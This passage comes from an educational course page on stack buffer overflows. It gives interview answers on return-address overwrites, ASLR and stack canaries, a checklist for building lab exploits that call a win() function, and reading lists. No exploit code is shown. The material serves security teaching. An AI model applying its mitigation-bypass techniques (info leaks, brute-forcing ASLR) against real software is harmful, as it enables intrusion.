  • Affected 17% of โ€œsecureโ€ web servers

Stagefright (2015):

  • Buffer overflow in Android media framework
  • Exploitable via MMS message
  • Affected 950 million devices

Why This Still Matters

  • 70% of vulnerabilities in Microsoft/Google products are memory safety issues
  • C and C++ still power: operating systems, browsers, databases, embedded systems
  • New vulnerabilities found constantly despite decades of awareness
  • Understanding attacks is essential for defense

Interview Preparation

Common Questions

  1. โ€œWhat is a buffer overflow? How does it lead to code execution?โ€
    • Buffer: fixed-size memory region
    • Overflow: writing beyond bufferโ€™s boundary
    • On stack: can overwrite return address
    • Return address controls next instruction pointer
    • Attacker provides address โ†’ controls execution
  2. โ€œWalk me through how a stack-based buffer overflow works.โ€
    • Function allocates buffer on stack
    • Unsafe copy (strcpy, gets) doesnโ€™t check bounds
    • Attacker input larger than buffer
    • Overflow overwrites saved RBP, then return address
    • Function returns to attacker-specified address
  3. โ€œWhat is ASLR? How does it protect against exploits?โ€
    • Address Space Layout Randomization
    • Randomizes where code, libraries, stack, heap are loaded
    • Attacker canโ€™t predict addresses to jump to
    • Broken by: info leaks, brute force, relative addressing
  4. โ€œWhat are stack canaries? How do they work?โ€
    • Random value placed between buffer and return address
    • Checked before function returns
    • Overflow must corrupt canary to reach return address
    • Wrong canary value โ†’ abort instead of return
    • Broken by: info leak revealing canary, overwrite without hitting it
  5. โ€œWhatโ€™s the difference between a stack overflow and a buffer overflow?โ€
    • Stack overflow: ran out of stack space (deep recursion)
    • Buffer overflow: wrote beyond buffer boundary
    • Both involve the stack but different issues
    • Stack overflow usually crashes immediately
    • Buffer overflow often silently corrupts
  6. โ€œWhy is gets() so dangerous? What should you use instead?โ€
    • gets() has no length parameter, reads until newline
    • Canโ€™t prevent overflow, no matter buffer size
    • Removed from C11 standard
    • Use: fgets(buffer, size, stdin) or better APIs

Self-Assessment Checklist

Understanding (Can You Explain?)

  • Stack frame layout: locals, saved RBP, return address
  • Why arrays growing up + stack growing down enables overflow
  • What the ret instruction does and why itโ€™s exploitable
  • How ASLR, stack canaries, and DEP/NX protect
  • Little-endian byte order for addresses
  • Why compiler flags affect exploitability

Implementation (Can You Build?)

  • Level 1: Variable overwrite with exact magic value
  • Level 2: Return address overwrite to call win()
  • Exploit scripts that work reliably
  • lldb session demonstrating corruption

Analysis (Can You Analyze?)

  • Calculate exact offset from buffer to target
  • Read AddressSanitizer output and understand it
  • Identify vulnerable patterns in code
  • Explain what mitigations would prevent specific exploits

Documentation (Can You Communicate?)

  • Write-up with clear diagrams
  • Step-by-step exploit development
  • Real-world impact discussion
  • lldb session logs with annotations

Resources

Books

Topic Book Chapter
Buffer overflow fundamentals โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch. 3
Stack layout and assembly โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7-3.10
Exploit development โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 1-5
Memory corruption attacks โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 10
Modern mitigations โ€œSecure Coding in C and C++โ€ by Robert Seacord Ch. 2-3

Online Resources

Practice Platforms


Summary

The Exploit Lab transforms abstract concepts into concrete reality:

  1. โ€œUndefined behaviorโ€ becomes โ€œI overwrote the return addressโ€
  2. โ€œSecurity vulnerabilityโ€ becomes โ€œI redirected executionโ€
  3. โ€œMemory safetyโ€ becomes โ€œthis is why it mattersโ€

After completing this project:

  • Youโ€™ll viscerally understand why buffer overflows are dangerous
  • Youโ€™ll know exactly what stack canaries, ASLR, and DEP protect against
  • Youโ€™ll read CVE reports and understand the mechanics
  • Youโ€™ll write more secure code because youโ€™ve seen what attacks look like

This knowledge is the foundation for:

  • Security engineering
  • Vulnerability research
  • Secure software development
  • Understanding why modern languages emphasize memory safety

Most importantly: Youโ€™ll never look at a strcpy the same way again.


Next Project: P06: Mini Text Editor (Capstone) - Apply everything youโ€™ve learned to build a real, usable application with complex memory management.